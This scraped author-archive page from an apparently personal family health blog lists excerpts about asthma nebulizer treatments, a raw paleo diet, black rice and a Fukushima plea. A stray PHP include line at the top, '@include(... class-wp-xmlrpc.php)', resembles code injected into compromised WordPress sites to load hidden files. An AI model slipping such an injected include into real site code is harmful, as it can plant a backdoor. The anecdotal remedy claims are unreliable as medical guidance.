@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 38 of 235

Author: Good Samaritan

Nebulizer Treatments for Asthma vs the Beach and Salty Sea Air

My wife and son are doing nebulizer treatments for asthma. We all got mucus and phlegm and coughs but the 2 of them were the worst hit. They were both down and out and could not go to work or school. My 2nd boy missed only one day and...

My Son Has Agreed to be a Full Time Rawish Paleo Dieter

My first born son is sick again of something that gives him a lot of hard stuck mucus / phlegm in his chest and makes it uncomfortable to breath deeply. He’s got a slight fever and he has no energy. Must be some germ going around. I caught it...

Black Rice from Kalinga Province

I got curious this morning at a specialty Kalinga Province representative products outlet and bought their black rice. Wow. I’ve never tasted black rice… ever. Nor have my family. So I bought. 150 pesos for 1 kilo. 5 times the price of regular white rice. What is special about...

S.O.S. From Fukushima English translation

Citizens from Fukushima City make a plea to the world to relay the message that they need help.  Seems they are asking for an “official” evacuation order from their Japanese government.  They compare their situation to that of the Chernobyl accident.  If this was Chernobyl, they would have been...

Coughs, Colds and Sore Throats in Season? Germs? Detox?

The house hold compound has some sick people these days… coughs, colds and sore throats and flu?  Saturday yaya #1 started a cold.  Sunday yaya #2 started her cold.  My wife had some kind of flu Wednesday she had to cancel her business flight Thursday.  Worst off was our...